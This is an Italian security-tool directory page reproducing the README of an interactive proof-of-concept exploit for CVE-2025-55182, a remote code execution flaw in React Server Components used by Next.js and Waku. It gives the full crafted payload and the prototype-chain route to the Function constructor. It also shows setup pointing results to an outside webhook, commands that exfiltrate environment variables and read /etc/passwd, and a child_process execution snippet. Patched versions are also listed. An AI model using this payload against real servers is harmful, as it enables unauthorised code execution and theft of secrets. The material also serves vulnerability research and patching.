Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
react2shell-interactive — CVE-2025-55182 PoC interattivo - React Server Components RCE - Ricerca educativa sulla sicurezza | Kitploit
Strumenti/GitHubGitHub/nathanj60/react2shell-interactive
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlApprendimento e FormazioneStrumento di Accesso RemotoSviluppo Payload
GitHub
nathanj60/react2shell-interactive

react2shell-interactive

CVE-2025-55182 PoC interattivo - React Server Components RCE - Ricerca educativa sulla sicurezza

Vedi Repository
29 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

React2Shell - CVE-2025-55182 PoC Interattivo

Shell interattivo per sfruttare CVE-2025-55182, una vulnerabilità di Remote Code Execution nei React Server Components.

Disclaimer

Questo strumento è fornito esclusivamente per scopi EDUCATIVI e di TEST DI SICUREZZA AUTORIZZATI.

  • Usalo solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta per il test
  • L'accesso non autorizzato a sistemi informatici è illegale
  • L'autore non è responsabile per l'uso improprio di questo strumento
  • Questo è un proof-of-concept per la ricerca e la sensibilizzazione sulla sicurezza

Panoramica della Vulnerabilità

CVE-2025-55182 colpisce React Server Components (RSC) in:

  • Next.js < 15.1.7, < 14.2.29, < 13.5.9
  • Waku (varie versioni)

La vulnerabilità consente l'esecuzione di codice in remoto (RCE) tramite payload malevoli inviati alle Server Actions.

Come Funziona

  1. Il protocollo RSC utilizza la sintassi $@x per riferirsi agli oggetti Chunk interni
  2. JavaScript rimuove automaticamente il wrapping degli oggetti con metodi .then() (simili a Promise)
  • Creando un payload malevolo con proprietà _response, _formData e _prefix controllate
  • L'attaccante può raggiungere il costruttore Function tramite la traversata della catena dei prototipi
  • Questo consente l'esecuzione arbitraria di JavaScript sul server
  • root@kitploit:~
    $3:constructor:constructor → Function constructor → RCE
    

    Installazione

    root@kitploit:~
    git clone https://github.com/NathanJ60/react2shell-interactive.git
    cd react2shell-interactive
    npm install
    

    Configurazione

    Modifica exploit.js e aggiorna questi valori:

    root@kitploit:~
    const TARGET_URL = 'http://localhost:3000/'          // Vulnerable Next.js server
    const WEBHOOK_URL = 'https://webhook.site/YOUR-ID'   // Your webhook URL
    

    Ottieni un webhook gratuito su: https://webhook.site

    Utilizzo

    root@kitploit:~
    node exploit.js
    

    Comandi

    ComandoDescrizione
    !testTesta se l'exploit funziona (invia conferma al webhook)
    !envEsfiltra le variabili d'ambiente (process.env)
    !js <codice>Esegui JavaScript personalizzato
    !helpMostra aiuto
    !exitEsci
    <comando>Esegui un comando shell (es. whoami, ls, cat /etc/passwd)

    Esempio di Sessione

    root@kitploit:~
    react2shell> !test
    [+] Sent! Check webhook
    
    react2shell> whoami
    [+] Sent: whoami
    
    react2shell> ls -la
    [+] Sent: ls -la
    
    react2shell> !env
    [+] Sent! Check webhook for env vars
    

    I risultati appaiono sul tuo webhook, non nel terminale.

    Dettagli Tecnici

    Struttura del Payload

    root@kitploit:~
    {
        '0': '$1',
        '1': {
            'status': 'resolved_model',
            'reason': 0,
            '_response': '$4',
            'value': '{"then":"$3:map","0":{"then":"$B3"},"length":1}',
            'then': '$2:then'
        },
        '2': '$@3',
        '3': [],
        '4': {
            '_prefix': '<JAVASCRIPT_CODE>//',
            '_formData': { 'get': '$3:constructor:constructor' },
            '_chunks': '$2:_response:_chunks'
        }
    }
    

    Flusso di Esecuzione

    1. Il payload viene inviato come dati multipart form con l'header next-action
    2. Il parser React Flight elabora i chunk
    3. $@3 crea un riferimento Chunk
    4. $3:constructor:constructor attraversa fino a Function
    5. Il contenuto di _prefix viene passato a Function() ed eseguito

    Note per Next.js 15+

    • Utilizza moduli ESM, quindi require() non è disponibile
    • Usa import() dinamico invece:
      root@kitploit:~
      import("child_process").then(cp => cp.execSync("whoami"))
      

    Versioni Corrette

    Aggiorna a queste versioni per correggere la vulnerabilità:

    • Next.js >= 15.1.7
    • Next.js >= 14.2.29
    • Next.js >= 13.5.9

    Riferimenti

    • React2Shell Official Site
    • Google Tsunami Scanner Plugin

    Licenza

    Licenza MIT - Solo a scopo educativo.

    Autore

    Ricerca sulla sicurezza PoC - Usa responsabilmente.

    Scarica lo strumento